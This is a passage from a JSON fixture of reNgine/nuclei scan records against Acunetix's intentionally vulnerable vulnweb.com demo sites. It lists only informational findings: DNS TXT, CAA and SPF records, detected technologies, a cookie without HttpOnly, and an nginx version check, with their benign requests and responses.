4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 26721\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3593\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 208, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:52.878Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 5165\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 5165\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 209, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:52.986Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 13447\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 13447\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1793\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 210, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:53.101Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 48581\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 48581\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86394\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 211, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:53.205Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 9050\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 9050\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1793\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 212, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:53.323Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 40372\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 40372\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1793\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 213, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:53.438Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 44905\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 44905\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1793\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 214, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:53.554Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 37255\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 37255\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1793\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 215, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:53.691Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 31737\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 31737\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86400\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 216, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:53.783Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 30260\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 30260\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86400\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 217, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 1, + "endpoint": null, + "target_domain": 1, + "template": "dns/spf-record-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/spf-record-detect", + "template_id": "spf-record-detect", + "matcher_name": "", + "name": "SPF Record - Detection", + "severity": 0, + "description": "An SPF TXT record was detected\n", + "impact": null, + "remediation": null, + "extracted_results": "[\"v=spf1 -all\\\"\"]", + "references": "['https://www.mimecast.com/content/how-to-create-an-spf-txt-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://vulnweb.com", + "discovered_date": "2024-11-13T02:34:53.880Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 42471\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 42471\n;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\nvulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\nvulnweb.com.\t3600\tIN\tTXT\t"google-site-verification=4LQORV-lTi-d4GPxtBEQWmFnwff7UAazQc9gZvHukbw"\n", + "is_llm_used": false, + "tags": [ + 1, + 3 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 218, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:53.975Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 31770\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 31770\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1800\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 219, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 112, + "endpoint": null, + "target_domain": 1, + "template": "dns/spf-record-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/spf-record-detect", + "template_id": "spf-record-detect", + "matcher_name": "", + "name": "SPF Record - Detection", + "severity": 0, + "description": "An SPF TXT record was detected\n", + "impact": null, + "remediation": null, + "extracted_results": "[\"v=spf1 -all\\\"\"]", + "references": "['https://www.mimecast.com/content/how-to-create-an-spf-txt-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://www.vulnweb.com", + "discovered_date": "2024-11-13T02:34:54.075Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 33315\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;www.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 33315\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;www.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\nwww.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 3 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 220, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "google-font-api", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0' 'http://testhtml5.vulnweb.com/like'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/like", + "discovered_date": "2024-11-13T02:34:54.171Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /like HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Thank you very much for your feedback! <!-- invalid -->\n<link src='http://localhost/link'>\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 221, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/cookies-without-httponly.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/cookies-without-httponly", + "template_id": "cookies-without-httponly", + "matcher_name": "", + "name": "Cookies without HttpOnly attribute - Detect", + "severity": 0, + "description": "Checks whether cookies in the HTTP response contain the HttpOnly attribute. If the HttpOnly flag is set, it means that the cookie is HTTP-only\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://owasp.org/www-community/HttpOnly']", + "cvss_metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' 'http://testhtml5.vulnweb.com/logout'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/logout", + "discovered_date": "2024-11-13T02:34:54.255Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /logout HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 302 FOUND\r\nConnection: close\r\nContent-Length: 265\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nLocation: http://testhtml5.vulnweb.com/\r\nServer: nginx/1.19.0\r\nSet-Cookie: username=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Path=/\r\n\r\n", + "is_llm_used": false, + "tags": [ + 6, + 7, + 8, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 222, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": 